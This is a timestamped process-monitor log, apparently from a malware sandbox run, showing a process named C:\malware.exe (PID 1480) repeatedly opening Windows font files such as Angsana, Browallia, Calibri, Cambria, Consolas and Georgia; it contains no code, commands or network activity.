29/2/2020 - 1:46:32.137Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.137Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.231Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaui.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.325Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsaub.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.418Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\angsauz.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.512Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browa.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.606Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browai.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.700Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browab.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.793Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browaz.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.887Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browau.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:32.981Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaui.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.75Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browaub.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.168Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\browauz.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.262Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiau.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.356Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiaub.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.450Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiauz.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.543Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\cordiaui.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.637Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdl.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.731Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdi.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.825Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdb.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:33.918Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcdbi.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.12Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcel.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.106Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upcei.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.200Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upceb.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.293Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcebi.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.387Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfl.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.481Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfi.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.575Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfb.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.668Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcfbi.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.762Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcil.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.856Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcii.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:34.950Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcib.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.43Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcibi.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.137Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcjl.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.231Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcji.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.325Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjb.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.418Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upcjbi.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.512Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upckl.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.606Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upcki.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.700Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckb.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.793Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upckbi.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.887Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcll.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:35.981Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upcli.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.75Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclb.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.168Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\upclbi.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.262Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.543Open1480C:\malware.exeC:\Windows\Fonts\kaiu.ttf
29/2/2020 - 1:46:36.684Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.684Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.684Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\l_10646.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\ariblk.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:36.825Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:36.872Open1480C:\malware.exeC:\Windows\Fonts\calibri.ttf
29/2/2020 - 1:46:37.59Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.59Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.59Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.200Open1480C:\malware.exeC:\Windows\Fonts\calibrii.ttf
29/2/2020 - 1:46:37.387Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.387Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.387Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.528Open1480C:\malware.exeC:\Windows\Fonts\calibrib.ttf
29/2/2020 - 1:46:37.715Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:37.715Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:37.715Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:37.856Open1480C:\malware.exeC:\Windows\Fonts\calibriz.ttf
29/2/2020 - 1:46:38.43Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.43Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.43Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.372Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.606Open1480C:\malware.exeC:\Windows\Fonts\cambria.ttc
29/2/2020 - 1:46:38.903Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:38.903Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:38.903Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:39.43Open1480C:\malware.exeC:\Windows\Fonts\cambriai.ttf
29/2/2020 - 1:46:39.278Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.278Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.278Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.418Open1480C:\malware.exeC:\Windows\Fonts\cambriab.ttf
29/2/2020 - 1:46:39.747Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:39.747Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:39.747Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:39.887Open1480C:\malware.exeC:\Windows\Fonts\cambriaz.ttf
29/2/2020 - 1:46:40.122Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.122Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.122Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candara.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.215Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarai.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.309Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candarab.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.403Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\Candaraz.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comic.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.497Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\comicbd.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.590Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.731Open1480C:\malware.exeC:\Windows\Fonts\consola.ttf
29/2/2020 - 1:46:40.778Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.778Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.778Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.918Open1480C:\malware.exeC:\Windows\Fonts\consolai.ttf
29/2/2020 - 1:46:40.965Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:40.965Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:40.965Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:41.106Open1480C:\malware.exeC:\Windows\Fonts\consolab.ttf
29/2/2020 - 1:46:41.153Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.153Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.153Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.293Open1480C:\malware.exeC:\Windows\Fonts\consolaz.ttf
29/2/2020 - 1:46:41.340Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.340Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.340Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.434Open1480C:\malware.exeC:\Windows\Fonts\constan.ttf
29/2/2020 - 1:46:41.528Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.528Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.528Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.622Open1480C:\malware.exeC:\Windows\Fonts\constani.ttf
29/2/2020 - 1:46:41.715Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.715Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.715Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.809Open1480C:\malware.exeC:\Windows\Fonts\constanb.ttf
29/2/2020 - 1:46:41.903Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:41.903Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:41.903Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:41.997Open1480C:\malware.exeC:\Windows\Fonts\constanz.ttf
29/2/2020 - 1:46:42.90Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.90Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.90Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.184Open1480C:\malware.exeC:\Windows\Fonts\corbel.ttf
29/2/2020 - 1:46:42.231Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.231Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.231Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.325Open1480C:\malware.exeC:\Windows\Fonts\corbeli.ttf
29/2/2020 - 1:46:42.372Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.372Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.372Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.465Open1480C:\malware.exeC:\Windows\Fonts\corbelb.ttf
29/2/2020 - 1:46:42.512Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.512Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.512Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.606Open1480C:\malware.exeC:\Windows\Fonts\corbelz.ttf
29/2/2020 - 1:46:42.653Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.653Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.653Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framd.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.747Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\framdit.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:42.840Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:42.981Open1480C:\malware.exeC:\Windows\Fonts\Gabriola.ttf
29/2/2020 - 1:46:44.575Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.575Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.575Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgia.ttf
29/2/2020 - 1:46:44.668Open1480C:\malware.exeC:\Windows\Fonts\georgiai.ttf
